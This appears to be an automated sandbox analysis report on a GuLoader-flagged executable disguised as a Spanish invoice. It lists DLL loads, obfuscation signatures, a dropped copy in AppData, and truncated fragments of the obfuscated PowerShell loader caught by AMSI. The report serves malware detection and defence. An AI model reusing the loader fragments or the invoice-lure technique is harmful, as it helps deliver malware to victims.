Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2067306282.0000000008378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2067306282.0000000008378000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000002.00000002.2068883529.000000000C12B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2663185185.00000000078AB000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Adskillelsen75 $Unartistically $Androsphinxes), (Stayernes245 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Lomilomi = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Retsvirknings)), $Tilfjelse).DefineDynamicModule($anvises, $false).DefineType($Fremtidssikker, $Forsgsversionens94, [System.MulticastD
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00C8CA82 push eax; mov dword ptr [esp], edx 2_2_00C8CA8C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00C80A2D pushfd ; iretd 2_2_00C80A32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_0746EFAC push ss; ret 2_2_0746EFBA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D576C0 push ebx; retf 2_2_08D576C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D53CC8 push cs; ret 2_2_08D53CCE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D56AF1 push ecx; retf 2_2_08D56AF2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D5408D push ebp; retf 2_2_08D5408E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D5A8A9 push cs; retf 2_2_08D5A8AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D53DD3 push ebp; ret 2_2_08D53DE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D549DE push cs; retf 2_2_08D54A2E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08D5AF2F push ds; retf 2_2_08D5AF50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323891E pushad ; iretd 7_2_0323891F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_0323BDA5 pushfd ; iretd 7_2_0323BDAA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_03238DDF push esp; iretd 7_2_03238DE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_03238C2F pushfd ; iretd 7_2_03238C30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044D3CC8 push cs; ret 7_2_044D3CCE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044D76C0 push ebx; retf 7_2_044D76C1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044D6AF1 push ecx; retf 7_2_044D6AF2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044D408D push ebp; retf 7_2_044D408E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044DA8A9 push cs; retf 7_2_044DA8AA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044DAF2F push ds; retf 7_2_044DAF50
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044D49DE push cs; retf 7_2_044D4A2E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_2_044D3DD3 push ebp; ret 7_2_044D3DE9
Creates processes with suspicious names
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe File created: \factura a00072-24.- tpc corporate events sl - pilar forga.exe
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe File created: \factura a00072-24.- tpc corporate events sl - pilar forga.exe Jump to behavior
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\argoters\Necrotizing\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
